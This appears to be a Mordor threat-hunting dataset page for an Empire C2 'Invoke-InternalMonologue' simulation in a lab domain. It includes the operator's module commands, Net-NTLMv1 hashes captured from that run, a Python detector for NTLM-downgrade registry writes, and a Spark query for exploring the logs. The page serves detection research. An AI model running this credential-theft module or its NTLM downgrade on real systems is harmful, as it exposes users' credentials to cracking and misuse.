Empire Invoke InternalMonologue

Metadata

Author: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2019/12/25
Modification Date: 2020/09/21
Tactics: ['TA0005']
Techniques: ['T1112']
Tags: ['Registry Modification', 'Windows Registry NetNTLM settings', 'Downgrade']

Dataset Description

This dataset captures an adversary downgrading three NTLM-related security settings in the environment: the challenge/response authentication protocol used for network logons, the minimum security negotiated for applications using NTLMSSP, and the setting that restricts outgoing NTLM traffic to remote servers.

Notebooks

Notebooks created by the community leveraging the Mordor datasets.

Author: Threat Hunter Playbook
Name: Extended NetNTLM Downgrade
Link: https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-191224222300.html

Simulation Plan

Environment: Mordor shire
Tool Type: C2
Module: invoke_internal_monologue

Adversary View

(Empire: XFLEZM9N) > usemodule credentials/invoke_internal_monologue*
(Empire: powershell/credentials/invoke_internal_monologue) > info

            Name: Invoke-InternalMonologue
            Module: powershell/credentials/invoke_internal_monologue
        NeedsAdmin: True
        OpsecSafe: False
        Language: powershell
MinLanguageVersion: 2
        Background: False
OutputExtension: None

Authors:
@eladshamir
@4lex

Description:
Uses the Internal Monologue attack to force easily-
decryptable Net-NTLMv1 responses over localhost and without
directly touching LSASS.
https://github.com/eladshamir/Internal-Monologue

Comments:
The underlying powershell function accepts switches that
[DISABLE] default behaviours. The default settings will
downgrade NetNTLM responses to v1, impersonate all users,
use challenge 1122334455667788 and restore the registry to
its original state. Set the options in this module to True
in order to DISABLE the behaviours Disabling Downgrade and
Impersonation yields higher OPSEC, but less than ideal loot

Options:

Name        Required    Value                     Description
----        --------    -------                   -----------
Agent       True        XFLEZM9N                  Agent to use for InternalMonologue      
Challenge   True        1122334455667788          Net-NTLM Challenge to send              
Downgrade   False                                 DISABLE downgrading to allow Net-NTLMv1 
                                                    responses                               
Impersonate False                                 DISABLE user impersonation and fetch    
                                                    only current user                       
Restore     False                                 DISABLE restoring the registry setting  
                                                    that allowed v1 responses               
Verbose     False                                 Verbose                                 

(Empire: powershell/credentials/invoke_internal_monologue) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked XFLEZM9N to run TASK_CMD_WAIT
[*] Agent XFLEZM9N tasked with task ID 2
[*] Tasked agent XFLEZM9N to run module powershell/credentials/invoke_internal_monologue
(Empire: powershell/credentials/invoke_internal_monologue) > pgustavo::shire:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:1122334455667788
IT001$::shire:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:1122334455667788
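As an added example (not code from the Mordor project or the Threat Hunter Playbook notebook), the following Python walks Sysmon EventID 13 registry-value-set records and flags writes that weaken the three settings described above, noting whether the same process later put the value back, which is the module's default Restore behaviour. Field names (Hostname, EventID, ProcessGuid, Image, TargetObject, Details) follow Sysmon's schema as assumed here, and the sample records are constructed.

```python
import re
from collections import defaultdict

# TargetObject suffixes of the three NTLM settings, each with a predicate that is True when
# the written DWORD weakens the setting (thresholds per Microsoft's documented semantics).
WEAK = {
    "Control\\Lsa\\LmCompatibilityLevel": lambda v: v < 3,                         # <3: client may send NTLMv1
    "Control\\Lsa\\MSV1_0\\NtlmMinClientSec": lambda v: (v & 0x00080000) == 0,    # NTLMv2 session security bit cleared
    "Control\\Lsa\\MSV1_0\\RestrictSendingNTLMTraffic": lambda v: v == 0,          # 0 = allow all outgoing NTLM
}
DWORD = re.compile(r"DWORD \((0x[0-9A-Fa-f]+)\)")   # Sysmon renders DWORD data as "DWORD (0x...)"

def find_downgrades(events):
    """One finding per (host, process, setting) that was weakened; 'restored' is True when a later
    write by the same process returned the setting to a non-weak value (set-then-restore pattern)."""
    writes = defaultdict(list)                       # (host, pguid, setting) -> [(value, image), ...]
    for e in events:
        if e.get("EventID") != 13:
            continue
        m = DWORD.search(e.get("Details", ""))
        setting = next((s for s in WEAK if e["TargetObject"].endswith(s)), None)
        if setting is None or m is None:
            continue
        writes[(e["Hostname"], e["ProcessGuid"], setting)].append((int(m.group(1), 16), e["Image"]))
    findings = []
    for (host, pguid, setting), seq in writes.items():
        weak = [i for i, (v, _) in enumerate(seq) if WEAK[setting](v)]
        if not weak:
            continue                                 # only hardening or neutral writes seen
        first = weak[0]
        restored = any(not WEAK[setting](v) for v, _ in seq[first + 1:])
        findings.append({"host": host, "image": seq[first][1], "setting": setting.rsplit("\\", 1)[1],
                         "value": hex(seq[first][0]), "restored": restored})
    return findings

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
LSA = "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\"
def _ev(target, details, pguid="{P1}", image=PS):   # builds a constructed EventID 13 record
    return {"Hostname": "IT001.shire.com", "EventID": 13, "ProcessGuid": pguid, "Image": image,
            "TargetObject": LSA + target, "Details": details}

SAMPLE_EVENTS = [  # constructed sample: downgrade of all three settings, then restore, plus a benign write
    _ev("LmCompatibilityLevel", "DWORD (0x00000002)"),
    _ev("MSV1_0\\NtlmMinClientSec", "DWORD (0x20000000)"),
    _ev("MSV1_0\\RestrictSendingNTLMTraffic", "DWORD (0x00000000)"),
    _ev("LmCompatibilityLevel", "DWORD (0x00000003)"),                              # restore
    _ev("MSV1_0\\NtlmMinClientSec", "DWORD (0x20080000)"),                          # restore
    _ev("MSV1_0\\RestrictSendingNTLMTraffic", "DWORD (0x00000002)"),                # restore
    _ev("LmCompatibilityLevel", "DWORD (0x00000005)", "{P2}", "C:\\Windows\\System32\\svchost.exe"),
]

if __name__ == "__main__":
    for f in find_downgrades(SAMPLE_EVENTS):
        print(f)
```

A finding with restored=True from a PowerShell image is the combination worth alerting on, since a legitimate hardening change is neither weak nor reverted moments later.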

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/empire_monologue_netntlm_downgrade.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-----------------+----------------------------------------+-------+-----+
|Hostname         |Channel                                 |EventID|count|
+-----------------+----------------------------------------+-------+-----+
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |10     |825  |
|IT001.shire.com  |Windows PowerShell                      |800    |149  |
|IT001.shire.com  |Microsoft-Windows-PowerShell/Operational|4103   |123  |
|ACCT001.shire.com|Microsoft-Windows-Sysmon/Operational    |7      |63   |
|IT001.shire.com  |security                                |4658   |48   |
|ACCT001.shire.com|Microsoft-Windows-Sysmon/Operational    |10     |30   |
|HR001.shire.com  |Microsoft-Windows-Sysmon/Operational    |10     |28   |
|IT001.shire.com  |security                                |5158   |27   |
|IT001.shire.com  |security                                |5156   |27   |
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |3      |25   |
|IT001.shire.com  |security                                |4656   |24   |
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |12     |24   |
|IT001.shire.com  |security                                |4690   |24   |
|FILE001.shire.com|Microsoft-Windows-Sysmon/Operational    |3      |22   |
|FILE001.shire.com|Security                                |5156   |22   |
|HFDC01.shire.com |Security                                |5156   |20   |
|FILE001.shire.com|Security                                |5158   |20   |
|HFDC01.shire.com |Microsoft-Windows-Sysmon/Operational    |3      |18   |
|HFDC01.shire.com |Microsoft-Windows-Sysmon/Operational    |10     |13   |
|HFDC01.shire.com |Security                                |5158   |11   |
+-----------------+----------------------------------------+-------+-----+
only showing top 20 rows